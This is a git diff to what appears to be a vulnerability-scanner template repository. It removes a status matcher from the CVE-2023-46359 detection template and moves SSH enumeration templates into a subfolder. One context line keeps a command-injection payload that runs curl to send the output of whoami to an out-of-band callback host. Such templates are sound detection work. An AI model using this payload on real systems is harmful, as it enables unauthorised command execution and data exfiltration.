diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml index 3c149d59f3..6e763c58b7 100644 --- a/http/cves/2023/CVE-2023-46359.yaml +++ b/http/cves/2023/CVE-2023-46359.yaml @@ -33,10 +33,6 @@ http: - "127.0.0.1 && curl http://$(whoami).{{interactsh-url}}" condition: and - - type: status - status: - - 200 - - type: word part: interactsh_protocol words: diff --git a/javascript/enumeration/obsolete-ssh-version.yaml b/javascript/enumeration/ssh/obsolete-ssh-version.yaml similarity index 100% rename from javascript/enumeration/obsolete-ssh-version.yaml rename to javascript/enumeration/ssh/obsolete-ssh-version.yaml diff --git a/javascript/enumeration/ssh-cbc-mode-ciphers.yaml b/javascript/enumeration/ssh/ssh-cbc-mode-ciphers.yaml similarity index 100% rename from javascript/enumeration/ssh-cbc-mode-ciphers.yaml rename to javascript/enumeration/ssh/ssh-cbc-mode-ciphers.yaml diff --git a/javascript/enumeration/ssh-diffie-hellman-logjam.yaml b/javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml similarity index 100% rename from javascript/enumeration/ssh-diffie-hellman-logjam.yaml rename to javascript/enumeration/ssh/ssh-diffie-hellman-logjam.yaml diff --git a/javascript/enumeration/ssh-password-auth.yaml b/javascript/enumeration/ssh/ssh-password-auth.yaml similarity index 100% rename from javascript/enumeration/ssh-password-auth.yaml rename to javascript/enumeration/ssh/ssh-password-auth.yaml diff --git a/javascript/enumeration/ssh-server-enumeration.yaml b/javascript/enumeration/ssh/ssh-server-enumeration.yaml similarity index 100% rename from javascript/enumeration/ssh-server-enumeration.yaml rename to javascript/enumeration/ssh/ssh-server-enumeration.yaml diff --git a/javascript/enumeration/ssh-sha1-hmac-algo.yaml b/javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml similarity index 100% rename from javascript/enumeration/ssh-sha1-hmac-algo.yaml rename to javascript/enumeration/ssh/ssh-sha1-hmac-algo.yaml diff --git a/javascript/enumeration/ssh-weak-algo-supported.yaml b/javascript/enumeration/ssh/ssh-weak-algo-supported.yaml similarity index 100% rename from javascript/enumeration/ssh-weak-algo-supported.yaml rename to javascript/enumeration/ssh/ssh-weak-algo-supported.yaml diff --git a/javascript/enumeration/ssh-weak-mac-algo.yaml b/javascript/enumeration/ssh/ssh-weak-mac-algo.yaml similarity index 100% rename from javascript/enumeration/ssh-weak-mac-algo.yaml rename to javascript/enumeration/ssh/ssh-weak-mac-algo.yaml diff --git a/javascript/enumeration/ssh-weak-public-key.yaml b/javascript/enumeration/ssh/ssh-weak-public-key.yaml similarity index 100% rename from javascript/enumeration/ssh-weak-public-key.yaml rename to javascript/enumeration/ssh/ssh-weak-public-key.yaml diff --git a/javascript/enumeration/ssh-weakkey-exchange-algo.yaml b/javascript/enumeration/ssh/ssh-weakkey-exchange-algo.yaml similarity index 100% rename from javascript/enumeration/ssh-weakkey-exchange-algo.yaml rename to javascript/enumeration/ssh/ssh-weakkey-exchange-algo.yaml